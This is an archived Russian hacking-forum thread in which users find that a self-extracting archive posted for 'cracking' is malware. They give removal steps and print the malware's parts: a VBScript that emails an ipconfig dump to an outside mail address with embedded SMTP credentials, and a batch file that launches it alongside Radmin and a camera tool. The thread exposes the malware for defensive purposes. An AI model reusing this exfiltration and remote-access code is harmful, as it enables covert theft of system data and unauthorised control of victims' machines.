Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Надо ломануть SFX-архив

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> Надо ломануть SFX-архив
Имя
Сообщение << Старые топики   Новые топики >>
Надо ломануть SFX-архив - 2011-06-11 07:05:09.946666   
Jansusi

Сообщений: 11
Оценки: 0
Присоединился: 2010-08-11 18:45:34.753333
 удалено.
Post #: 1
RE: Надо ломануть SFX-архив - 2011-06-11 08:19:43.393333   
Ltonid

Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
 Этот архив не так прост. Внутри есть вирус.
Сообщение о заражение он посылает на мыло mr.fukushima@mail.ru.
http://zalil.ru/31238823 - настоящий чистый файл.

Что именно делает вирус и как его удалить напишу ниже.
1. Удалить файл C:\windows\SPEED.exe
2. Удалить ключ рееста [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Driver_"="C:\\windows\\SPEED.exe -LM"
Post #: 2
RE: Надо ломануть SFX-архив - 2011-06-11 08:34:43.693333   
Hulio

Сообщений: 89
Оценки: 0
Присоединился: 2011-04-03 16:00:09.076666
 Зря Ltonid удалил моё сообщение…

Добавлю.

Создаёт скрытые файлы: скрипт:

Const cdoSendUsingPickup = 1
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = "Проверка"
objMessage.From = "mr.fukushima@mail.ru"
objMessage.To = "mr.fukushima@mail.ru"
objMessage.Textbоdу = "Привет"
objMessage.AddAttachment "C:\ip.txt"
objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = NONE
objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "mr.fukushima"
objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "japended"
objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 587
objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False
objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
objMessage.Configuration.Fields.updаtе
objMessage.Send
Wsсriрt.Quit

Батник:

@echo off
ipconfig /all >>C:\ip.txt
start mail.vbs
start cam.exe
start rad.exe

ещё распаковываются два инсталлятора:
radmin и ещё, если не ошибаюсь какая-то следящая х-ня.

Оказывается всего 11 объектов на автозагрузку идёт! Сначала я написал три.
Post #: 3
RE: Надо ломануть SFX-архив - 2011-06-11 11:09:52.670000   
Hulio

Сообщений: 89
Оценки: 0
Присоединился: 2011-04-03 16:00:09.076666
 Jansusi не вздумай мне говорить, что это не твоих рук дело. Файл закачан 11 июн 2011 06:31 ты сюда закинул ссылку 11.06.2011 7:05:09.
Post #: 4
Страниц:  [1]
Все форумы >> [Для начинающих] >> Надо ломануть SFX-архив







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.